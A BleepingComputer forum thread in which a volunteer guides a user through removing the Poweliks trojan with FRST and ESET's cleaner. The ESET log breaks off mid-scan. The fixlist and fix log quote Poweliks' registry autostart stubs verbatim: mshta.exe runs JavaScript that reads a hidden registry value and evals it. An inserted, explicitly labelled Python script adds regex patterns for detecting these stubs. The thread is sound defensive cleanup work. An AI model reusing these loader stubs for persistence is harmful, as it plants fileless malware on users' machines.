Error: (10/15/2016 11:56:50 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/15/2016 11:33:31 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/15/2016 11:27:46 PM) (Source: VSS) (EventID: 8194) (User: )

Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.

.

This is often caused by incorrect security settings in either the writer or requestor process.

 

 

Operation:

   Gathering Writer Data

 

Context:

   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}

   Writer Name: System Writer

   Writer Instance ID: {8a920161-5c39-41dc-aa22-1c4df677717b}

 

Error: (10/15/2016 11:08:01 PM) (Source: McLogEvent) (EventID: 259) (User: NT AUTHORITY)

Description: The file C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8faea2.lnk contains the Trojan-PoweLike!lnk Trojan. Undetermined clean error, deleted successfully. Detected using Scan engine version 5800.7501 DAT version 8319.0000.

 

Error: (10/15/2016 10:25:37 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08

Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1

Exception code: 0xc0000005

Fault offset: 0x0000000000048d84

Faulting process id: 0x76c

Faulting application start time: 0x01d22786cbc649bb

Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe

Faulting module path: C:\Windows\SYSTEM32\ntdll.dll

Report Id: 1cfe611b-937a-11e6-84b8-f0def19d1112

 

 

System errors:

=============

Error: (10/16/2016 11:10:52 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 10:49:12 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 10:39:59 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

 

Error: (10/16/2016 09:40:27 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 09:39:56 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

Error: (10/16/2016 08:31:58 AM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The CAM Service service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (10/16/2016 08:31:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 08:31:19 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

Error: (10/16/2016 12:41:13 AM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: The following boot-start or system-start driver(s) failed to load:

cdrom

 

Error: (10/16/2016 12:40:41 AM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

 

 

==================== Memory info ===========================

 

Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz

Percentage of memory in use: 64%

Total physical RAM: 3979.23 MB

Available physical RAM: 1397.7 MB

Total Virtual: 7956.65 MB

Available Virtual: 4766.94 MB

 

==================== Drives ================================

 

Drive c: (Windows7_OS) (Fixed) (Total:287.15 GB) (Free:217.63 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:1.54 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 298.1 GB) (Disk ID: 8D14B1C3)

Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=287.2 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

 

==================== End of Addition.txt ============================

 

How can I delete this trojan?  Any help you can provide is appreciated.

Thank you!




 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 18 October 2016 - 10:30 AM

Hi pmate888 :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Looks like you're indeed infected with Poweliks. We'll use FRST to remove it, and I'll ask you to run ESET Poweliks Cleaner again to make sure it's gone.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    CreateRestorePoint:
    
    Zip: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk;C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe
    Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]
    
    Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
    Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION
    
    C:\ProgramData\APN
    C:\Users\Wayne\AppData\Local\1282a1
    C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl
    C:\Users\Wayne\AppData\Roaming\1282a1
    C:\Users\Wayne\AppData\Roaming\403522
    
    EmptyTemp:
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
Follow the Steps 6 to 10 in the guide below to scan your computer with ESET Poweliks Cleaner, and copy/paste the content of the output log in your next reply after.

http://www.bleepingcomputer.com/virus-removal/remove-poweliks-trojan

After running the FRST fix, a file called Upload.zip will be created on your desktop. Upload it to the link below please.

http://www.bleepingcomputer.com/submit-malware.php?channel=194

After running FRST, ESET and restarting, do you still get warnings about Poweliks?

Your next reply(ies) should include:
  • Copy/pasted content of FRST's fixlog.txt;
  • Copy/pasted content of the ESET Poweliks Cleaner log;
  • Confirmation that you uploaded the Upload.zip file to the link provided above;
  • Answer to my question about Poweliks-related alerts on your system;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.
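
The entries in the fixlist above share a recognisable shape: an autostart value that launches mshta.exe with a javascript: URL, which reads a second registry value through WScript.Shell and passes it to eval, plus shortcuts in hex-named AppData folders. The following triage script is an added example, not part of the original post or of FRST; the function names `triage` and `payload_keys` are hypothetical, and the sample lines are copied from the FRST output quoted in this thread.

```python
import re

# Entries copied from the FRST output quoted in this thread: four tied to the
# infection, then two ordinary entries from the same log for contrast.
SAMPLE_LOG = r'''
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION
Shortcut: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk -> C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat ()
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
'''

# mshta.exe given a javascript: URL instead of an .hta file.
MSHTA_JS = re.compile(r'mshta(?:\.exe)?"?\s+"?javascript:', re.I)
# A registry read whose result can be handed to eval(): the stub holds no
# payload itself, it only points at the value that does.
REG_READ = re.compile(r'RegRead\("([^"]+)"\)', re.I)
EVAL_CALL = re.compile(r'\beval\(', re.I)
# Six-hex-digit folder and file names under AppData, as seen in this log.
RANDOM_PATH = re.compile(
    r'\\AppData\\(?:Local|Roaming)\\[0-9a-f]{6}\\[0-9a-f]{6}\.(?:lnk|bat)\b', re.I)
# FRST's own marker for value names that normal tools cannot address.
INVALID_NAME = "Value Name with invalid characters"


def triage(log_text):
    """Return one finding per suspicious log line, with the reasons it matched."""
    findings = []
    lines = [l for l in log_text.splitlines() if l.strip()]
    for number, line in enumerate(lines, start=1):
        reasons, keys = [], []
        if MSHTA_JS.search(line):
            reasons.append("mshta-javascript")
        reads = REG_READ.findall(line)
        if reads and EVAL_CALL.search(line):
            reasons.append("registry-staged-eval")
            # The log shows the JavaScript-escaped form (double backslashes).
            keys = [r.replace("\\\\", "\\") for r in reads]
        if INVALID_NAME in line:
            reasons.append("invalid-value-name")
        if RANDOM_PATH.search(line):
            reasons.append("random-appdata-path")
        if reasons:
            findings.append({"line": number, "reasons": reasons,
                             "payload_keys": keys})
    return findings


def payload_keys(findings):
    """Registry values the loader stubs read from, de-duplicated."""
    return sorted({k for f in findings for k in f["payload_keys"]})


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"entry {f['line']}: {', '.join(f['reasons'])}")
    for key in payload_keys(results):
        print("payload stored in:", key)
```

Both mshta stubs resolve to the same registry value, so that value is the one to confirm gone in a follow-up scan once the autostart entries have been removed.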


#3 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts

Posted 19 October 2016 - 02:27 AM

Hi Aura

 

Thank you for responding and offering your expertise.  The contents of the FRST fixlog.txt file is:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (18-10-2016 20:26:22) Run:2
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

Zip: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk;C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe
Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]

Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File
Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION

C:\ProgramData\APN
C:\Users\Wayne\AppData\Local\1282a1
C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl
C:\Users\Wayne\AppData\Roaming\1282a1
C:\Users\Wayne\AppData\Roaming\403522

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
================== Zip: ===================
"C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" -> not found
"C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat" -> not found
=========== Zip: End ===========
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**npfolr<*> => value could not remove. Error in Deleting Value: C0000034
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**ypqwknh<*> => value could not remove. Error in Deleting Value: C0000034
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{adad7ac6-fdcf-11e0-aba0-806e6f6e6963}" => key removed successfully
HKCR\CLSID\{adad7ac6-fdcf-11e0-aba0-806e6f6e6963} => key not found.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b16e947a-43af-11e5-863b-f0def19d1112}" => key removed successfully
HKCR\CLSID\{b16e947a-43af-11e5-863b-f0def19d1112} => key not found.
C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk => not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" => key removed successfully
C:\ProgramData\APN => moved successfully
C:\Users\Wayne\AppData\Local\1282a1 => moved successfully
C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl => moved successfully
C:\Users\Wayne\AppData\Roaming\1282a1 => moved successfully
C:\Users\Wayne\AppData\Roaming\403522 => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6437753 B
Java, Flash, Steam htmlcache => 3174 B
Windows/system/drivers => 1053667 B
Edge => 0 B
Chrome => 10547453 B
Firefox => 140262408 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Wayne => 338853656 B

RecycleBin => 6362 B
EmptyTemp: => 482.1 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:28:19 ====

 

 

The contents of the ESET Poweliks Cleaner log file is:

 

[2016.10.18 21:01:30.813] - Begin
[2016.10.18 21:01:30.815] -
[2016.10.18 21:01:30.857] -     ....................................
[2016.10.18 21:01:30.858] -   ..::::::::::::::::::....................
[2016.10.18 21:01:30.860] -   .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT..    Win32/Poweliks
[2016.10.18 21:01:30.862] -  .::EE::::EE:SS:::::::.EE....EE....TT......   Version: 1.0.0.5
[2016.10.18 21:01:30.864] -  .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT......   Built: Jun 30 2015
[2016.10.18 21:01:30.865] -  .::EE:::::::::::::SS:.EE..........TT......
[2016.10.18 21:01:30.867] -   .::EEEEEE:::SSSSSS::..EEEEEE.....TT.....    Copyright © ESET, spol. s r.o.
[2016.10.18 21:01:30.868] -   ..::::::::::::::::::....................    1992-2015. All rights reserved.
[2016.10.18 21:01:30.868] -     ....................................
[2016.10.18 21:01:30.868] -
[2016.10.18 21:01:30.868] - --------------------------------------------------------------------------------
[2016.10.18 21:01:30.868] -
[2016.10.18 21:01:30.869] - INFO: OS: 6.1.7601 SP1
[2016.10.18 21:01:30.870] - INFO: Product Type: Workstation
[2016.10.18 21:01:30.870] - INFO: WoW64: True
[2016.10.18 21:01:30.870] - INFO: Machine guid: 3E3956B5-9F1A-4AA7-9D59-1B87E601D065
[2016.10.18 21:01:30.871] -
[2016.10.18 21:01:31.028] - INFO: Scanning for system infection...
[2016.10.18 21:01:31.028] - --------------------------------------------------------------------------------
[2016.10.18 21:01:31.028] -
[2016.10.18 21:01:31.028] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2016.10.18 21:01:31.029] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2016.10.18 21:01:31.031] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]...
[2016.10.18 21:01:31.032] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]...
[2016.10.18 21:01:31.033] - INFO: Processing classes...
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.211] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBA}]
